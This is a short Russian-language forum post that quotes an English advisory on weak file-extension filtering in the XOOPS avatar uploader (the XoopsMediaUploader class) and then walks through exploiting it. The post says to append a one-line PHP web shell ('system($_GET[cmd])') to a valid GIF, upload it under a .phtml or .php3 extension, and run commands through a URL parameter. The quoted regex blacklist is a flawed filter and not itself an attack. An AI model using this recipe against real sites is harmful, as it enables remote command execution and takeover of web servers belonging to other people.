Итак, смотрим в деталях:

--------------------------------------

Details
=======
User may upload valid image file with insecure extension through avatar
upload if "Allow custom avatar upload" is set to "Yes" in "User Info
Settings". This setting is not on in default installation. This is cause
of weak file extension validation XoopsMediaUploader class in file
uploader.php.

if ( preg_match( '/\.(php|cgi|pl|py|asp)$/i', $this->mediaName ) )

$this->setErrors('Filename rejected');
return false;
}

In some web server installation other extension like .phtml,*.php3 is
threat as php script.
------------------------------------------

откуда следует, что если разрешено заливать свои аватары, можно залить графический файл, расширение которого не .(php|cgi|pl|py|asp),
поэтому заливаем с расширением .phtml,*.php3, php5 и т.д., потом, на некоторых серваках файлы с такым расширением считаются PHP скриптами и соответственно интерпретируются.
Проблема в том что при заливке файла проверяется является ли он валидным(нормальным) графическим файлом, т.е. берем нормальный gif, открываем текстовым редактором и в конце набираем что-то типа <?php system($_GET[cmd]); ?> заливаем и открываем нашу картинку в броузере с параметром cmd=ls теоретически PHP проскакивает гиф часть и обрабатывает наш пхп код :-)
Вроде понятно обьяснил, есть вопросы, задавайте...